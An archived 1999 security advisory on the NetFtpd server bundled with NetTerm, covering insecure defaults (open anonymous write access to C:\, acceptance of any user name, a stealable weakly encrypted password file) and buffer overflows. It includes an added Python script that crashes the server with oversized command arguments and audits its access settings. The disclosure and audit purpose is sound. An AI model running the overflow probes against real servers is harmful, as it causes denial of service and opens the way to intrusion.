
dna-1999-001.htm

Posted Nov 15, 1999
Authored by Erik Iverson

Dragonmount Networks Advisory 1999-001 [DNA-1999-001] Intersoft's NetFTP daemon (included with NetTerm) has many insecure options enabled by default, including allowing access to the entire hard drive to everybody. There are also numerous buffer overflow problems, resulting in remote Denial of Service and possible remote execution of code.

tags | remote, denial of service, overflow
MD5 | c7223629b77020242320afda43d02929

<!DOCTYPE HTML PUBLIC "html.dtd">
<HTML>

<HEAD>
<META CONTENT="text/html; charset=windows-1252" HTTP-EQUIV="Content-Type">
<META NAME="GENERATOR" CONTENT="Microsoft FrontPage 4.0">
<META NAME="ProgId" CONTENT="FrontPage.Editor.Document">
<TITLE>DNA</TITLE>
<LINK TYPE="text/css" REL="stylesheet" HREF="http://www.dragonmount.net/styles.css">

<META NAME="Microsoft Border" CONTENT="tb, default"></HEAD>

<BODY><!-- msnavigation--><TABLE WIDTH="100%" CELLSPACING="0" BORDER="0" CELLPADDING="0"><TR><TD>


</TD></TR><!-- msnavigation--></TABLE><!-- msnavigation--><TABLE WIDTH="100%" CELLSPACING="0" CELLPADDING="0" BORDER="0"><TR><!-- msnavigation--><TD VALIGN="top">

<TABLE WIDTH="750" CELLSPACING="0" CELLPADDING="0" BORDER="0">
<TR>
<TD WIDTH="130" VALIGN="top" ALIGN="right"><!-- webbot bot="Include" u-include="../nav-sec.htm" tag="BODY" startspan -->

<P><A HREF="http://www.dragonmount.net/security/index.htm" CLASS="sec-navlinkb">Security Home</A></P>
<P><A HREF="http://www.dragonmount.net/security/dna/index.htm" CLASS="sec-navlinkb">Advisories</A>

<!-- webbot bot="Include" endspan i-checksum="26044" -->
<P>&nbsp;</TD>
<TD WIDTH="17" VALIGN="top" ALIGN="center"><IMG WIDTH="1" SRC="http://www.dragonmount.net/images/orangepixel.gif" HEIGHT="100%" BORDER="0"></TD>
<TD VALIGN="top">
<H1 CLASS="sec-H1">DNA-1999-001: NetTerm FTP Daemon</H1>
<H2 CLASS="sec-H2">Vendor:</H2>
<P CLASS="sec-text"><A HREF="http://starbase.neosoft.com/~zkrr01/" CLASS="sec">InterSoft</A></P>
<H2 CLASS="sec-H2">Program:</H2>
<P CLASS="sec-text">NetFtpd distributed with NetTerm 4.2.a/4.2.2/4.2.1,
and possibly previous versions</P>
<H2 CLASS="sec-H2">Platforms:</H2>
<P CLASS="sec-text">All 32-bit versions of Windows</P>
<H2 CLASS="sec-H2">Risk:</H2>
<P CLASS="sec-text">High</P>
<H2 CLASS="sec-H2">Problem:</H2>
<P CLASS="sec-text">Many insecure options are enabled by default. A number
of buffer overflows also exist.</P>
<H2 CLASS="sec-H2">Solution:</H2>
<P CLASS="sec-text"><B>Vendor:</B> Do not enable insecure options by
default. Perform length validation on all input to the program.<BR>
<B>User:</B> Stop using NetFtpd immediately unless you are certain that it
is configured correctly, that the machine is not exposed to attack from
the console, and that the only account enabled is your own. Disable
anonymous access immediately.</P>
<H2 CLASS="sec-H2">Details</H2>
<P CLASS="sec-text">Users of NetFtpd (bundled with the newest version of
NetTerm, 4.2.a, and possibly with previous versions) are exposed to a
number of security problems. The ones we have concentrated on concern
the FTP server itself, not the NetTerm terminal emulation program.</P>
<P CLASS="sec-text">*NONE OF THIS AFFECTS THE NETTERM CLIENT, ONLY THE FTP
SERVER BUNDLED WITH IT!*</P>
<OL>
<LI>
<P CLASS="sec-text">By default, the FTP server grants anyone presenting
any user name access to the entire hard drive. The option that controls
this is labelled "Accept calls from anyone." The label is
misleading; I took it to mean "Accept connections from
anyone.", not "Let anyone log in." Why would there be
an option to give anyone presenting any user ID full access to the hard
drive? It is on by default, and all servers I have seen configured
have left this option turned on. This should not be an option, period.
If it is an option, it should not be the default. Absolutely
ridiculous.</LI>
<LI>
<P CLASS="sec-text">Anonymous access is allowed by default. Many FTP
servers ship this way; the problem is that the default (unconfigured)
read and write directory for user anonymous is C:\. So even if you force
people to provide a login and password, allowing anonymous access without
changing the directory privileges gives anyone full access to the hard
drive. Write privilege means exactly that, including overwriting existing
files: with the server running "out of the box", anyone can
upload a new autoexec.bat, and so on. Users also have delete privileges
by default, and there is no option to turn off deleting files, or even
writing files; it is all or nothing with this program. The default
read/write directory for anonymous should be somewhere below the root of
the drive, perhaps C:\Program Files\NetTerm\FtpRoot. Secondly, anonymous
access should be turned off by default.</LI>
<LI>
<P CLASS="sec-text">The password scheme is weak. First and foremost,
there is no "administrator" password: anyone with console
access can add or delete users and change any user's password. An admin
password should be required before any of these actions can be taken.
The passwords are stored in a file called "password" by
default. The file has the form<BR>
<BR>
user1:encryptedpass<BR>
user2:encryptedpass<BR>
etc.<BR>
<BR>
So anyone with access to this file does not need to go through the
program at all: they can edit the file by hand, adding, deleting or
changing users and passwords. In most cases, users can upload a new
"password" file, overwriting the current settings. This
assumes the directory problems noted in [2] have not been fixed. Also,
the encryption method is weak and would not take much skill to
break.</LI>
<LI>
<P CLASS="sec-text">Surprise: a closed-source Windows FTP server has a
buffer overflow. Nothing exciting here. The USER command appears to be
truncated to 16 characters, so no problem there, and the PASS command
for a normal user also stood up to our testing. However, the server has
problems when a large string [~1024 chars] is sent as the argument of
the following: dir, ls, mkdir, pass [when used for anonymous access],
delete, and rmdir (ftp client commands; on the wire these are LIST/NLST,
MKD, PASS, DELE and RMD). Each of these crashes the server with an
invalid page fault. From the looks of it, remote code execution is a
definite possibility. Note that PASS overflows only when user anonymous
logs in [i.e. where the server asks for an e-mail address]. This is why
anonymous access should be disabled immediately if you are going to
continue using this product.</LI>
</OL>
<H2 CLASS="sec-H2">Conclusion:</H2>
<P CLASS="sec-text">Given everything wrong with this program, we can only
hope that no person or business will run it on any machine they wish to
keep secure. Hopefully, now that these problems have been brought to
InterSoft's attention, they will be fixed in a new release. Users should
thoroughly test that anonymous access is refused and that arbitrary user
names do not work. Each account should be restricted to specific
directories, not the entire C:\, so that if its username and password
are compromised the whole drive is not exposed. There may well be other
exploits that work in this manner. If you allow anyone access, even
anonymous, do not let them read the directory the program was installed
in: they will be able to retrieve the password file remotely and steal
all the encrypted passwords, which may yield elevated access.</P>
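<P CLASS="sec-text">The following is an added example written for this
page; it is not code from the advisory or from InterSoft. It turns item 4
and the checklist in the Conclusion into a script: probe_verb() opens a
fresh session, sends one suspect command with a ~1024-byte argument and
reports whether the server answered or died, and audit_access() checks
that anonymous logins and made-up user names are refused and that a real
account cannot CWD out to C:\. Because no copy of NetFtpd is available
here, start_fake_ftpd() is a constructed stand-in whose behaviour (any
user name and anonymous accepted by default, root C:\, 16-character USER
truncation, sessions that die on oversized arguments) only follows the
advisory's description. The account erik/secret, the 256-byte crash
threshold, the reply texts and the client-to-wire verb mapping (dir/ls to
LIST/NLST, mkdir to MKD, delete to DELE, rmdir to RMD) are assumptions
made for the example.</P>

```python
# Added example for DNA-1999-001 (item 4 and the Conclusion); not code from the
# advisory or from InterSoft.  start_fake_ftpd() is a constructed stand-in, NOT NetFtpd.
import socket
import threading

BIG = "A" * 1024  # the ~1024-byte argument the advisory sent
# On the wire, item 4's dir/ls, mkdir, delete, rmdir are LIST/NLST, MKD, DELE, RMD.
SUSPECT_VERBS = ("LIST", "NLST", "MKD", "DELE", "RMD", "PASS")


def _recv_line(sock):
    """One CRLF-terminated line; '' means the peer closed the connection."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            return ""
        buf += chunk
    return buf.decode("latin-1").rstrip("\r\n")


def _login(sock, user, password):
    _recv_line(sock)  # 220 banner
    sock.sendall(f"USER {user}\r\n".encode())
    _recv_line(sock)  # 331
    sock.sendall(f"PASS {password}\r\n".encode())
    return _recv_line(sock)[:3]  # '' if the server dropped the session


def probe_verb(host, port, verb, user="anonymous", password="x@x", arg=BIG):
    """Send VERB with an oversized argument (for PASS: as the anonymous password).
    Returns the reply code, or 'crashed' if the session died instead of answering."""
    try:
        with socket.create_connection((host, port), timeout=3) as s:
            if verb == "PASS":
                code = _login(s, user, arg)
            else:
                _login(s, user, password)
                s.sendall(f"{verb} {arg}\r\n".encode())
                code = _recv_line(s)[:3]
    except OSError:  # refused, reset or timed out
        return "crashed"
    return code or "crashed"  # '' = clean EOF where a reply was due


def audit_access(host, port, user, password, outside_dir="C:\\"):
    """The Conclusion's checklist: anonymous rejected, made-up user names
    rejected, and a real account unable to CWD outside its own directory."""
    def login_code(u, p):
        with socket.create_connection((host, port), timeout=3) as s:
            return _login(s, u, p)
    findings = {"anonymous_allowed": login_code("anonymous", "x@x") == "230",
                "any_user_allowed": login_code("nosuchuser42", "junk") == "230"}
    with socket.create_connection((host, port), timeout=3) as s:
        _login(s, user, password)
        s.sendall(f"CWD {outside_dir}\r\n".encode())
        findings["escapes_to_root"] = _recv_line(s)[:3] == "250"
    return findings


def start_fake_ftpd(anonymous=True, accept_anyone=True, root="C:\\", limit=256):
    """Stand-in with the advisory's defaults: a SUSPECT verb (or an anonymous PASS)
    over `limit` bytes ends the session like the real crash; CWD works only under
    `root`.  Returns (port, stop_function)."""
    creds = {"erik": "secret"}  # constructed account for the hardened case
    srv = socket.create_server(("127.0.0.1", 0))
    srv.settimeout(0.2)  # so the acceptor notices stop() promptly

    def session(conn):
        user = ""
        with conn:
            conn.sendall(b"220 fake ftpd\r\n")
            while True:
                line = _recv_line(conn)
                if not line:
                    return
                verb, _, arg = line.partition(" ")
                verb = verb.upper()
                if verb == "USER":
                    user = arg[:16]  # the 16-char USER truncation from item 4
                    conn.sendall(b"331 Password required\r\n")
                elif verb == "PASS":
                    if user == "anonymous" and anonymous and len(arg) > limit:
                        return  # simulated crash: oversized anonymous "e-mail"
                    ok = (anonymous if user == "anonymous"
                          else accept_anyone or creds.get(user) == arg)
                    conn.sendall(b"230 Logged in\r\n" if ok else b"530 Login incorrect\r\n")
                elif verb in SUSPECT_VERBS and len(arg) > limit:
                    return  # simulated crash
                elif verb == "CWD":
                    inside = arg.lower().startswith(root.lower())
                    conn.sendall(b"250 OK\r\n" if inside else b"550 Denied\r\n")
                else:
                    conn.sendall(b"200 OK\r\n")

    def acceptor():
        while srv.fileno() >= 0:  # until stop() closes the listening socket
            try:
                conn, _ = srv.accept()
            except OSError:  # accept timeout, or socket closed
                continue
            threading.Thread(target=session, args=(conn,), daemon=True).start()

    threading.Thread(target=acceptor, daemon=True).start()
    return srv.getsockname()[1], srv.close
```

<P CLASS="sec-text">Against a real host, leave the stand-in out and point
probe_verb() and audit_access() at the daemon. Two caveats: on the real
NetFtpd each hit takes the whole server down with an invalid page fault
rather than just one session, so expect to restart it between verbs, and a
'crashed' result demonstrates the denial of service only, not code
execution. Running the hardened configuration (anonymous off, arbitrary
user names off, root below C:\) through audit_access() until all three
findings are False is the check the Conclusion asks for.</P>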
<P CLASS="sec-text">Release: November 15, 1999</P>
<P CLASS="sec-text">Dragonmount Networks Advisory 1999-001 [DNA-1999-001]<BR>
Erik Iverson<BR>
<A HREF="mailto:erik@dragonmount.net" CLASS="sec">erik@dragonmount.net</A><BR>
<A HREF="http://www.dragonmount.net/" CLASS="sec">http://www.dragonmount.net</A></TD>
</TR>
</TABLE>
&nbsp;

<!-- msnavigation--></TD></TR><!-- msnavigation--></TABLE><!-- msnavigation--><TABLE WIDTH="100%" CELLSPACING="0" CELLPADDING="0" BORDER="0"><TR><TD>

<TABLE WIDTH="750" CELLSPACING="0" CELLPADDING="0" BORDER="0">
<TR>
<TD WIDTH="25"></TD>
<TD WIDTH="718">
<P CLASS="footertext" ALIGN="center">This page was last modified Monday, November 15, 1999<BR>
Copyright 1999 Dragonmount Networks. All rights reserved.<BR>
<A HREF="http://www.dragonmount.net/privacy_usage.html" CLASS="navlink">Privacy and Usage Policy</A>.
Questions or comments? <A HREF="http://www.dragonmount.net/contact.htm" CLASS="navlink">Contact us</A>.<BR>
</TD>
</TR>
</TABLE>
<P>&nbsp;

</TD></TR><!-- msnavigation--></TABLE></BODY>

</HTML>



© 2012 Packet Storm. All rights reserved.
